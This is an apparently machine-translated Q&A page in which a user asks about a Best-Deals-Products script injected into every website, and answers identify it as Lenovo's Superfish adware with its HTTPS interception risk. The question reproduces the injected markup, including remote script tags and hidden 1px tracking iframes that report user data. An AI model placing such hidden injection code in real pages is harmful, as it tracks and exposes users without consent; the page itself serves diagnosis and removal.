web-dev-qa-db-ja.com

Best-Deals-Productsとは何ですか?それはマルウェアですか?

マルウェア/アドウェアと思われるものを見つけました。スクリプトは、自分で作成した後でも、アクセスするすべてのWebサイトに追加されます。これは:http://puu.sh/dgIF0/0c452eb390.pngに追加され、iFrameは本体(http://puu.sh/dgJf3/c700693208.png)に作成されます。いくつかチェックして、リンクをたどると、メタデータを収集してインターネットにアップロードしていることに気づきました。 (コードの一部:http://puu.sh/dgIJE/3c53d5b1cc.pngこのコードではエラーも発生しました)。インターネット上でBest-Deal-Productsに関する(有用な)情報をたくさん見つけることができません(したがって、このメッセージ)。また、InternetExplorerまたはGoogle chromeポータブル(「通常の」Google chromeの代わりに)を使用すると、再びそこにあります。JunkwareRemovalToolとしてのプログラムは問題を解決しませんでした(実際に問題)私のシステムについて:私はadvast!(無料)を使用しています、私はwindows8 64ビットOSを持っています、そしてLenovaのものがあります。私のコンピュータからhtmlファイルを開くとき問題は起こりません、インターネットからのhtmlファイルだけです。使用しているネットワークは関係ないようです。空のphpファイルを作成して000webhostにアップロードしました。ソースコードを見ると、頭の中には<script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script>しかありませんが、「inspect」を使用している場合はelement "(000webhostコードのほかに)私のものではない多くのコードが表示され、要素は添付ファイルにあります。以下も添付ファイルにあります:タグ内にあるBest-Deal-ProductsのURLとコンソールログgoogle.nlにアクセスしたときのgoogle chrome

私の主な質問は次のとおりです。Best-Deal-Productsとは何ですか?それは何をするためのものか?それは私にとって何らかの悪影響がありますか?はいの場合、私はそれについて何ができますか?十分な情報を提供したいと思いますが、そうでない場合は、尋ねると、私はそれ(またはTeamViewerセッション?)を見つけようとします。また、avastに助けを求めました!およびVirusTotal。

添付ファイル:

タグ内のリンク

https://www.best-deals-products.com/ws/sf_preloader.jsp?dlsource=hdrykzc&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/sf_code.jsp?dlsource=hdrykzc&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/slideup2/main.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/side_slider/main.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/js/base_single_icon.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/css/main.css?v=2014.12.4.3.1

タグ内のリンク:

https://www.best-deals-products.com/ws/userData.jsp?dlsource=hdrykzc&userid=&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/co/register_server_layer.html?version=2014.12.4.3.1

google.nlにアクセスしたときにgoogle chrome

Resource interpreted as Script but transferred with MIME type text/html: "https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc".
sf_main.jsp?dlsource=hdrykzc:322 Uncaught TypeError: Cannot read property 'appendChild' of null
(index):4 Resource interpreted as Script but transferred with MIME type text/html: "https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc".
Resource interpreted as Image but transferred with MIME type text/javascript: "https://www.best-deals-products.com/ws/tu.action?userId=fa8fa52b-c827-d5d4-…d8615-d4a&referrer=&page_url=https%3A%2F%2Fwww.google.nl%2F%3Fgws_rd%3Dssl".
frame?sourceid=1&hl=nl&Origin=https%3A%2F%2Fwww.google.nl&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%…:1 Refused to load the script 'https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc' because it violates the following Content Security Policy directive: "script-src 'unsafe-inline' 'unsafe-eval' 'self' https://*.googleapis.com https://*.gstatic.com https://apis.google.com https://www.google-analytics.com https://www.googletagmanager.com https://*.talkgadget.google.com https://pagead2.googleadservices.com https://pagead2.googlesyndication.com https://tpc.googlesyndication.com https://s.ytimg.com https://www.youtube.com https://clients1.google.com https://www.google.com".

000webhostでホストされている「空白の」phpファイルの要素:

    <html><head><script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script><style type="text/css"></style><script type="text/javascript" src="http://www.best-deals-products.com/ws/sf_preloader.jsp?dlsource=hdrykzc&amp;ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/sf_code.jsp?dlsource=hdrykzc&amp;ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/slideup2/main.js?ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/side_slider/main.js?ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/js/base_single_icon.js?ver=2014.12.4.4.1"></script><link rel="stylesheet" href="http://www.best-deals-products.com/ws/css/main.css?v=2014.12.4.4.1"></head>
    <body>
    <div>

        </div>


<!-- Hosting24 Analytics Code -->
<!-- End Of Analytics Code --><script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>

<iframe src="http://www.best-deals-products.com/ws/userData.jsp?dlsource=hdrykzc&amp;userid=&amp;ver=2014.12.4.4.1" style="position: absolute; top: -100px; left: -100px; z-index: -10; border: none; visibility: hidden; width: 1px; height: 1px;"></iframe><iframe src="https://www.best-deals-products.com/ws/co/register_server_layer.html?version=2014.12.4.4.1" style="position: absolute; width: 1px; height: 1px; left: -100px; top: -100px; visibility: hidden;"></iframe><iframe style="position: absolute; width: 1px; height: 1px; top: 0px; left: 0px; visibility: hidden;"></iframe><sfmsg id="sfMsgId" data="{&quot;imageCount&quot;:0,&quot;ip&quot;:&quot;1.1.1.1&quot;}"></sfmsg></body></html>
6
Eadorimthryth

多くのLenovoコンピューターには、すべてのHTTPに対してman-in-the-middle攻撃を実行し、自己署名SSL証明書を使用してHTTPS要求を保護する「Superfish」と呼ばれるソフトウェアが付属していることが明らかになっています。特に、Superfishは、ロードされたすべてのWebページにbest-deals-products.comからjavascriptを挿入します。

さらに、その背後にある会社の無知のおかげで、含まれている秘密鍵はすでに抽出されており、LenovoコンピューターからのHTTPSトラフィックを傍受するために公開で使用する準備ができています。

つまり、銀行や取引の場合でも、攻撃者はWi-Fi信号を盗聴することで、安全と思われるコンテンツを読み取ることができます。これは非常に危険な状況です。

JSBinのようなWebベースのIDEを使用してコードを記述し、ファイルをダウンロードしてホスティングサーバーにアップロードすることにより、スクリプトが他の人にも広まった場合がありました。 Lenovoコンピューターを使用します。

あなたが脆弱であるかどうかを含む完全な詳細をチェックすることができます ここ 。また、Superfishに関する Lenovoの公式声明 、脆弱性に関する セキュリティアドバイザリ 、および提案された 削除手順 も確認することをお勧めします。

6
kiding

ベストディール製品とは何ですか?それは何をするためのものか?

あなたがオンラインショッピングに行くとき、それはウェブの他の場所からのそれらのリストされた価格で同様の製品の追加を表示します。私はあなたが物事のより安い価格を見つけるのを助けることを意図していると思います。それが他のことを密かに行う可能性も非常に高いです。

それは私にとって何らかの悪影響がありますか?

より多くの広告は私にとってネガティブです。また、私はそれが私の後ろで何か悪いことをしていないとは信じていません。

はいの場合、私はそれについて何ができますか?

これはおそらくケースごとに異なります。私の場合、それは私のコンピューターに付属していました。 「LenovoExperienceImprovement」をアンインストールすると、他にもいくつか変更を加えましたが、なくなりました。それはPokki、またはおそらく何か他のものに関連している可能性があります。

3
Alan Trick

それはlenovoだけではなく、いくつかのブラウザアドオンにはsuperfishのjavascriptが含まれています。私が考えることができるのは、Youtube Downloader 4K-Video Downloader https://addons.mozilla.org/en-US/firefox/addon/media- downloader / 約16万人のユーザーがいます。xpiを開いてsuperfish.jsというファイルを確認できます。コンテンツを調べると、best-deals-products.comがどこから来たのかがわかります。あなたがそのアドオンを削除する場合は、より良いクリーンな代替手段があります。同じことを行う他のフリーウェアアドオンがあります。インストールするものに注意してください。

0
guest